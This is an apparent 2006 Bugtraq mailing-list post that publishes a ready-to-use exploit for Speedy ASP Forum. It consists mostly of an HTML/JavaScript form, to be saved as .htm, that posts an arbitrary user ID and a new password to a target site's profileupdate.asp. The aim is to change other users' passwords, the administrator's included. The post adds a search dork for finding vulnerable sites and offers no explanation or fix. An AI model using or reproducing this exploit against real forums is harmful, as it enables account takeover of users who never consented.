Date: 27 May 2006 13:08:02 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit


# Title  :   Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit

# Dork   :   Copyright © ASPwebSoft 

# Author :   ajann

# greetz :   Nukedx

###Code:

Save to .htm

*************************************************************************************************************************************


<title>Pass Change</title>
<script language="JavaScript">  
//Coded ajann
function islemKontrol(){ 
     if(document.InputForm.name.value=="" || document.InputForm.email.value=="" || document.InputForm.id.value=="" || document.InputForm.password.value=="" || document.InputForm.passwordre.value=="" || document.InputForm.country.options.value == 0 || document.InputForm.adres.value=="" ){ 
          alert("Alani Bos Biraktiniz") 
          return false 
     } 
{
document.InputForm.action= document.InputForm.adres.value
document.InputForm.submit();

return true 
}
 }
</script>

<body bgcolor="#000000">

<form name = "InputForm" method = "post" onSubmit = 'return islemKontrol()'>
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change // 
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User Name&nbsp;&nbsp;&nbsp;&nbsp; 
:&nbsp;&nbsp; </b></font>
<input type="text" name="name"  value="" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: Surname Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Mail&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
:&nbsp; </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">&nbsp;&nbsp; Example: 
mail@...ain.com</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User &#304;d&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
:&nbsp; </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">&nbsp; Example: &#304;d:1 Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country&nbsp; :&nbsp; </b>
</font>
<select size="1"  name="country">
<option value=0>Choose Country</option>
<option  value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
:&nbsp; </font></b>

<input type = "text" name="password" value="Password" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">&nbsp;&nbsp; 
:&nbsp; </font></b>
<input type = "text" name="passwordre" value="Re Password" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action&nbsp; &nbsp; : </b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: http://[target]/[path]/profileupdate.asp</font></p>

<p>

<input type = "submit" name="Submit" value="Change"> </p>

<br>

&nbsp;</form>
*************************************************************************************************************************************

And Code

Powered by blists - more mailing lists